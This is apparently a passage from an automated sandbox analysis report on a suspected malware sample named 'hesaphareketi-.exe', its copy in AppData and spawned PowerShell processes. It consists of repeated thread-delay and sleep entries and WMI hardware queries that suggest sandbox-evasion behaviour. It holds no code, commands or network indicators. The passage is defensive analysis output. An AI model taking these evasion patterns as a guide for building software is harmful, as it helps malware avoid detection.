                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197765
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197655
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197429
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197312
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197203
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197093
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196984
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196764
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196656
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196437
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196328
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196218
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196109
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195999
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195888
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195781
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195671
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195562
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195453
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195343
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195234
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195124
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195014
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194906
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194796
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194687
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194559
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194452
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 1006Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8079Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 634Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6900Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 530Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 3000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow / User API: threadDelayed 6854Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWindow / User API: threadDelayed 1564Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWindow / User API: threadDelayed 7411
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWindow / User API: threadDelayed 2449
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 1896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 6400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep count: 41 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 5772Thread sleep count: 3000 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 5772Thread sleep count: 6854 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1199015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1198030s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197802s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197683s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197452s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197209s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1197093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1196000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1195059s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1194953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1194843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1194734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1194624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 4508Thread sleep time: -1194515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 6504Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 2576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 2360Thread sleep count: 7411 > 30
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 2360Thread sleep count: 2449 > 30
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1199109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198999s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198662s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198202s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1198092s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197655s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197429s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1197093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196764s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1196109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195999s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195888s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195124s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1195014s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1194906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1194796s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1194687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1194559s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe TID: 5820Thread sleep time: -1194452s >= -30000s
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199890Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199671Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199453Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199343Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199234Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199125Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1199015Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198796Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198687Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198577Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198468Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198359Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198249Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198140Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1198030Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197921Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197802Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197683Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197452Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197343Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197209Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197093Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196984Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196874Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196765Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196656Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196546Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196437Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196328Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196218Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196109Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195890Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195671Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195453Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195343Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195219Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195059Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194953Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194843Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194734Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194624Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199765
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199656
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199437
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199328
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199218
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1199109
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198999
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198890
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198662
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198531
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198421
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198312
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198202
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1198092
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197984
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197765
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197655
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197429
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197312
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197203
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1197093
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196984
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196874
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196764
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196656
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196546
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196437
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196328
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196218
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1196109
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195999
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195888
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195781
